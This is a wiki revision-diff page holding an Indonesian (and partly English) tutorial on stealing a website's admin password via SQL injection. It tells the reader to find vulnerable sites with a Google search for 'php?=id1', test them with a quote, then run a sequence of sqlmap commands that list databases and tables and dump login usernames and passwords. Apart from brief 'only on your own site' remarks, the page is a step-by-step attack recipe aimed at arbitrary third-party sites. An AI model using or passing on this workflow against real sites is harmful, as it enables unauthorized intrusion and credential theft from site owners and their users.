Sqlmap: memperoleh password database sql: Difference between revisions

From OnnoCenterWiki
Jump to navigationJump to search
Onnowpurbo (talk | contribs)
No edit summary
Onnowpurbo (talk | contribs)
No edit summary
Line 16: Line 16:
  http://alamatweb.com/index.php?=id1′
  http://alamatweb.com/index.php?=id1′


Jika anda memperoleh error maka situs tersebut vurnerable / ada kelemahan & dapat di serang. Jika situs tersebut adalah situs anda sendiri maka sebaiknya dimatikan secepatnya, amankan baru nyalakan kembali.


If you get an error the website is vulnerable.
==Step 2 – Kali SQLMAP – dapatkan website database==


Go to step 2.
sqlmap –u http:\\website.com/page.php?id=1 –dbs
If this is your own website – shut it down immediately. You need to secure it before you bring it back online.


******
Ambil semua database yang tersedia di web.
Step 2 – Kali SQLMAP – get website databases
SQLMAP  – u http:\\website.com/page.php?id=1 –dbs


This will fetch all available databases on the website.  Did you see them listed?
==Step 3 – Cari tabel LOGIN==


******
  sqlmap –u http:\\website.com/page.php?id=1 –D www –tables
Step 3 – Find the LOGIN table
  SQLMAP  – u http:\\website.com/page.php?id=1 –D www – tables


Did you see all the TABLES on the website list out?
Cari target seperti, tabel login, username atau password.


Look for likely targets… eg Login, username or password table.
==Step 4 – Dapatkan semua login data==


If you’re not on your own website, or a best friends website (who’s sat next to you), you are into illegal terrority. STOP now!!
sqlmap –u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login –columns


******
Tabel ini akan menampilkan kolom, seperti Cookie, ID, IP, Password, Username.
Step 4 – Get all the Login Data (from Step 3)


SQLMAP  u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login –columns
==Step 5 Dapatkan Username (& Admin)==


This should display columns with items such as Cookie, ID, IP, Password, Username.
sqlmap –u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C username –dump


******
Cari “admin”
Step 5 – Get Usernames (& Admin)
SQLMAP  – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C username –dump


Look for “admin”


*****
==Step 6 – Dapatkan Password (dari Admin)==
Step 6 – Get Passwords (of Admin)
 
  SQLMAP  – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C password –dump
  sqlmap –u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C password –dump


That’s it.
That’s it.





Revision as of 22:35, 13 November 2014

Sumber: http://uwnthesis.wordpress.com/2014/02/01/kali-linux-how-to-hack-use-sqlmap-for-auto-sql-injection-find-website-admin-password/


Berikut adalah cara memperoleh password, termasuk password admin sebuah situs web. Lakukan ini ke web anda sendiri, agar tidak melanggar hukum.


Step 1 – Google search php?=id1

Cari di Google, keyword

php?=id1

Jika sudah dapat URL-nya dari Google, Tambahkan sebuah quote di akhir URL-nya sehingga menjadi

http://alamatweb.com/index.php?=id1′

Jika anda memperoleh error maka situs tersebut vurnerable / ada kelemahan & dapat di serang. Jika situs tersebut adalah situs anda sendiri maka sebaiknya dimatikan secepatnya, amankan baru nyalakan kembali.

Step 2 – Kali SQLMAP – dapatkan website database

sqlmap –u http:\\website.com/page.php?id=1 –dbs

Ambil semua database yang tersedia di web.

Step 3 – Cari tabel LOGIN

sqlmap –u http:\\website.com/page.php?id=1 –D www –tables

Cari target seperti, tabel login, username atau password.

Step 4 – Dapatkan semua login data

sqlmap –u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login –columns

Tabel ini akan menampilkan kolom, seperti Cookie, ID, IP, Password, Username.

Step 5 – Dapatkan Username (& Admin)

sqlmap –u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C username –dump

Cari “admin”


Step 6 – Dapatkan Password (dari Admin)

sqlmap –u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C password –dump

That’s it.


Referensi